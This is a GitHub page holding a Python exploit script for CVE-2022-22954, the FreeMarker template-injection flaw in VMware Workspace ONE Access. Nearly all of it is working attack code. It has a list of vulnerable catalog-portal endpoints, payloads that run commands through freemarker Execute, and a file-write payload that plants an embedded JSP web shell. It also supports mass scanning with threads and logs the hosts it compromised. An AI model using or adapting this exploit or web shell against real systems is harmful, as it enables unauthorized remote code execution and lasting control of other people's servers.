-
Notifications
You must be signed in to change notification settings - Fork 21
/
Copy pathCVE-2022-22954.py
187 lines (160 loc) · 7.29 KB
/
CVE-2022-22954.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, quote_plus
import requests
import re
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
shell = """
<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
"""
payloads = {
"/catalog-portal/ui?code=&deviceType=",
"/catalog-portal/ui?code=&deviceUdid=",
"/catalog-portal/hub-ui?deviceType=",
"/catalog-portal/hub-ui?deviceUdid=",
"/catalog-portal/hub-ui/byob?deviceType=",
"/catalog-portal/hub-ui/byob?deviceUdid=",
"/catalog-portal/ui/oauth/verify?error=&deviceType=",
"/catalog-portal/ui/oauth/verify?error=&deviceUdid=",
"/catalog-portal/ui/oauth/verify?code=&deviceType=",
"/catalog-portal/ui/oauth/verify?code=&deviceUdid=",
}
headers = {
"Host": "localhost",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
}
proxies = {
"http": "127.0.0.1:7890",
"https": "127.0.0.1:7890"
}
def print_banner():
banner = '''
_______ ________ ___ ____ ___ ___ ___ ___ ____ ________ __
/ ____/ | / / ____/ |__ \ / __ \__ \|__ \ |__ \|__ \/ __ \/ ____/ // /
/ / | | / / __/________/ // / / /_/ /__/ /_______/ /__/ / /_/ /___ \/ // /_
/ /___ | |/ / /__/_____/ __// /_/ / __// __/_____/ __// __/\__, /___/ /__ __/
\____/ |___/_____/ /____/\____/____/____/ /____/____/____/_____/ /_/
- by bewhale
'''
print(banner)
def get_results(text):
try:
# print(text)
# results = re.search("device id: (.*), device type: (.*), auth token", text)
result = re.search("device id: (.*), device type", text).group(1)
if "null" == result:
if "auth token" in text:
result = re.search("device type: (.*), auth token", text).group(1)
else:
result = re.search("device type: (.*)and token revoke status", text).group(1)
print("\033[33;1m" + result.replace('\\n', '\n').replace('\\t', '\t') + "\033[0m")
except Exception as e:
print("\033[33;1m[-] 命令执行结果解析失败,请确认命令是否存在(使用绝对路径)或者手动尝试!\033[0m")
def check_url(url):
url = url.strip()
if 'https' not in url:
url = "https://" + url
return url
def exploit(url, code):
for payload in payloads:
try:
payload = urljoin(url, payload + code)
# output = requests.get(url, headers=headers, verify=False, timeout=15, proxies=proxies)
output = requests.get(payload, headers=headers, verify=False, timeout=15)
if output.status_code == 400 and ("Authorization context is not valid" in output.text or "Cannot run program" in output.text or "FreeMarker template error" in output.text):
print("\033[31;1m[+] " + url + " is vul!\033[0m")
return output.text
except Exception as e:
print("\033[36;1m[-] " + url + " time out!\033[0m")
# print(str(e))
return None
print("\033[36;1m[-] " + url + " is not vul!\033[0m")
return None
def verify(url, cmd, flag=0):
poc = '${"freemarker.template.utility.Execute"?new()("' + cmd + '")}'
res = exploit(url, poc)
if res:
get_results(res)
if flag:
with open("success.txt", "a+") as f:
f.write(url + "\n")
def write_file(url, filename, content, flag=0):
content = quote_plus(content.replace('"', '\\"'))
if "/" not in filename and "\\" not in filename:
filename = "/opt/vmware/horizon/workspace/webapps/SAAS/" + filename
exp = '${"freemarker.template.utility.ObjectConstructor"?new()("java.io.FileOutputStream","' + filename + '").write("freemarker.template.utility.ObjectConstructor"?new()("java.lang.String","' + content + '").getBytes())}'
res = exploit(url, exp)
if res:
url = urljoin(url, filename[37:])
print("\033[33;1m[+] webshell: " + url + "\033[0m")
print("\033[33;1m[+] 上传完成,检查是否上传成功...\033[0m")
try:
# resp = requests.get(url, headers=headers, verify=False, timeout=15, proxies=proxies)
resp = requests.get(url, headers=headers, verify=False, timeout=15)
if resp.status_code == 200:
print("\033[33;1m[+] 上传成功!\033[0m")
print("\033[33;1m[+] 往 catalog-portal 目录发送POST请求时校验了csrf\n 会导致webshell管理工具连接不上,可以尝试写入其他目录\033[0m")
if flag:
with open("webshell.txt", "a+") as f:
f.write(url + "\n")
else:
print("\033[36;1m[-] 访问失败, 状态码: " + str(resp.status_code) + "\033[0m")
except Exception as e:
print(str(e))
print("\033[36;1m[-] 访问失败, " + str(e) + "\033[0m")
print("\033[36;1m[-] 请手动进行尝试!!!\033[0m")
if __name__ == "__main__":
print_banner()
parser = argparse.ArgumentParser()
group1 = parser.add_mutually_exclusive_group(required=True)
group1.add_argument('-u', '--url', dest='url', help='target url')
group1.add_argument('-f', '--file', dest='file', help='target file')
group2 = parser.add_mutually_exclusive_group()
group2.add_argument('-c', '--command', dest='cmd', default='whoami', help='command execute')
group2.add_argument('-fn', '--filename', dest='filename', help='upload file name,support absolute path')
parser.add_argument('-fc', '--content', dest='content', help='upload file content')
parser.add_argument('-fp', '--filepath', dest='filepath', help='local file path')
parser.add_argument('-t', '--thread', dest='thread', default=100, type=int, help='thread')
args = parser.parse_args()
if args.filepath:
with open(args.filepath) as f:
args.content = f.read()
if args.content is None:
args.content = shell
if args.url:
if args.filename:
write_file(check_url(args.url), args.filename, args.content)
else:
verify(check_url(args.url), args.cmd)
else:
if args.filename:
with ThreadPoolExecutor(args.thread) as executor:
[executor.submit(write_file, check_url(url), args.filename, args.content, 1) for url in
open(args.file, "r")]
else:
with ThreadPoolExecutor(args.thread) as executor:
[executor.submit(verify, check_url(url), args.cmd, 1) for url in open(args.file, "r")]